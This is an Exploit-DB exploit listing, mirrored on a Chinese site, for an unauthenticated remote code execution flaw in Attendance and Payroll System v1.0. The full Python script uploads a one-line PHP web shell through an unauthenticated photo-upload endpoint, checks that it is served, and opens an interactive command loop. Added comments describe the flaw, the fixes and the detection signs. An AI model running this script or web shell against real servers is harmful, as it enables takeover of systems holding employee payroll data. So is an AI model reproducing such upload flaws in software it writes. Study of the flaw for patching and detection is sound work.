Attendance and Payroll System v1.0 – Remote Code Execution (RCE)

  • 作者: pr0z
    日期: 2022-03-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50801/
  • # Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
    # Date: 04/03/2022
    # Exploit Author: pr0z
    # Vendor Homepage: https://www.sourcecodester.com
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
    # Version: v1.0
    # Tested on: Linux, MySQL, Apache
    
    import requests
    import sys
    from requests.exceptions import ConnectionError
    
    # Interface class to display terminal messages
    class Interface():
        """Minimal ANSI-colour console writer for the script's status lines.

        Every method prints directly to stdout and returns None; the escape
        codes are exposed as instance attributes (``self.red`` etc.) so callers
        can reuse them.
        """

        def __init__(self):
            # Foreground colours and text attributes as raw ANSI escape codes.
            self.red = '\033[91m'
            self.green = '\033[92m'
            self.white = '\033[37m'
            self.yellow = '\033[93m'
            self.bold = '\033[1m'
            self.end = '\033[0m'

        def _tagged(self, marker, colour, message):
            """Return one status line: a coloured marker in brackets, then *message*."""
            return f"[{colour}{marker}{self.end}] {message}"

        def header(self):
            """Print the three-line banner shown at start-up."""
            banner = (
                '\n>> Attendance and Payroll System v1.0',
                '>> Unauthenticated Remote Code Execution',
                '>> By pr0z\n',
            )
            for line in banner:
                print(line)

        def info(self, message):
            """Print *message* behind a white ``*`` marker."""
            print(self._tagged('*', self.white, message))

        def warning(self, message):
            """Print *message* behind a yellow ``!`` marker."""
            print(self._tagged('!', self.yellow, message))

        def error(self, message):
            """Print *message* behind a red ``x`` marker."""
            print(self._tagged('x', self.red, message))

        def success(self, message):
            """Print *message* in bold behind a green check-mark marker."""
            emphasised = f"{self.bold}{message}{self.end}"
            print(self._tagged('✓', self.green, emphasised))
    
    
    # --- Script flow, annotated --------------------------------------------
    # 1. POST a PHP file to the admin photo-upload script; no session cookie
    #    or credentials are sent with the request.
    # 2. GET the file back from the images/ directory to confirm it was stored
    #    under the client-supplied name and is served (and, the script
    #    assumes, executed) by the web server.
    # 3. Loop: send commands as the `cmd` query parameter and print the body.
    #
    # Application-side weaknesses this relies on (as exercised here; confirm
    # against the PHP source): the upload handler is reachable without
    # authentication, and it stores the client-supplied filename/extension in
    # a web-served directory without validating it.
    # Fixes: enforce the admin login on employee_edit_photo.php, allow-list
    # image extensions and check file content, generate the stored filename
    # server-side, and keep uploads outside the document root or disable
    # script execution in images/.
    # Detection: a new .php file under apsystem/images/, a POST to
    # employee_edit_photo.php without an authenticated session, and GETs to
    # images/*.php carrying a cmd query parameter.

    upload_path = '/apsystem/admin/employee_edit_photo.php'  # upload handler
    shell_path = '/apsystem/images/shell.php'                # where the script expects the file to be served from
    #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

    # Payload: one-line PHP that hands the `cmd` request parameter to system().
    shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"

    # Form fields sent alongside the file. 'id' is presumably the employee row
    # the photo belongs to; 'upload' is an empty string (the parentheses do
    # nothing) and looks like the submit-button field — TODO confirm both
    # against the HTML form.
    multipart_form_data = {
        'id': 1,
        'upload': (''),
    }

    # The file part: a client-chosen filename ending in .php with PHP content.
    files = {'photo': ('shell.php', shell_data)}

    output = Interface()
    output.header()

    # Check for arguments: a target base URL is required; -h prints usage.
    if len(sys.argv) < 2 or '-h' in sys.argv:
        output.info("Usage: python3 rce.py http://127.0.0.1")
        sys.exit()

    # Upload the shell. The POST response is never inspected; success is
    # judged solely by the follow-up GET below.
    target = sys.argv[1]
    output.info(f"Uploading the web shell to {target}")
    r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)

    # Validating shell has been uploaded.
    # verify=False disables TLS certificate checking. This response is
    # overwritten immediately by the GET inside the try block, so this
    # request is redundant.
    output.info(f"Validating the shell has been uploaded to {target}")
    r = requests.get(target + shell_path, verify=False)
    try:
        # Unlike the line above, this GET leaves certificate verification on,
        # so an https target with an untrusted certificate would fail here.
        r = requests.get(target + shell_path)
        if r.status_code == 200:
            output.success('Successfully connected to web shell\n')
        else:
            # Any non-200 (e.g. a 404 when the upload was rejected) lands in
            # the generic handler below.
            raise Exception
    except ConnectionError:
        output.error('We were unable to establish a connection')
        sys.exit()
    except:
        # Bare except: catches everything else, including KeyboardInterrupt,
        # and reports it as "unexpected".
        output.error('Something unexpected happened')
        sys.exit()

    # Remote code execution: interactive loop, one HTTP GET per command.
    while True:
        try:
            cmd = input("\033[91mRCE\033[0m > ")
            if cmd == 'exit':
                # 'exit' is routed through the KeyboardInterrupt handler below.
                raise KeyboardInterrupt
            # The command travels as the `cmd` query parameter, so the web
            # server's access log records every command verbatim — a useful
            # forensic artefact.
            r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)
            if r.status_code == 200:
                print(r.text)  # raw response body, i.e. whatever the page returned
            else:
                raise Exception
        except KeyboardInterrupt:
            # Ctrl-C or the 'exit' command.
            sys.exit()
        except ConnectionError:
            output.error('We lost our connection to the web shell')
            sys.exit()
        except:
            # Bare except, as above: everything else is reported as unexpected.
            output.error('Something unexpected happened')
            sys.exit()